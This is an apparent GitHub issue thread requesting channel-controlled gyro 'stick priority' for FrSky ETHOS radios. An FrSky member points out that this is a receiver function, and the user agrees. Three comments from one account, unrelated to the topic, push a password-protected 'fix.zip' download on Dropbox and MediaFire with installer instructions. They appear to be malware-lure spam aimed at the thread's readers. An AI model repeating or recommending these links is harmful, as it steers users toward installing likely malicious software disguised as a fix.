### ISSUE TITLE
"stick priority" as input from radio - feature request

### ISSUE THREAD

**Issue by noamkrief** [FrSkyRC/ETHOS-Feedback-Community#4436]
Here is the problem.
When we have crow like on my turbine viper, we automatically lose alot of gyro gain.

That's because as far as the gyro is concerned, "crow" is a commanded stick movement.

In fact, 200% in the LUA, and 100% in the Ch12 gain is not enough for landing configuration.

Having 0% stick priority fixes the problem. It's a hack, but it works.

But for other flight modes such as flaps up, I'd like to have some stick priority,

Is there a way in the future to have stick priority managed by some channel? Just like Channel 12?

Thanks!!!

**Comment by WSA1k** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bsongis-frsky** [comment]
It's a gyro function (not Ethos), right?

**Comment by noamkrief** [comment]
> It's a gyro function (not Ethos), right?
@bsongis-frsky 
Yes - I think it may be inappropriate to put this request here. Because it would be a feature request for the RX, not ethos.
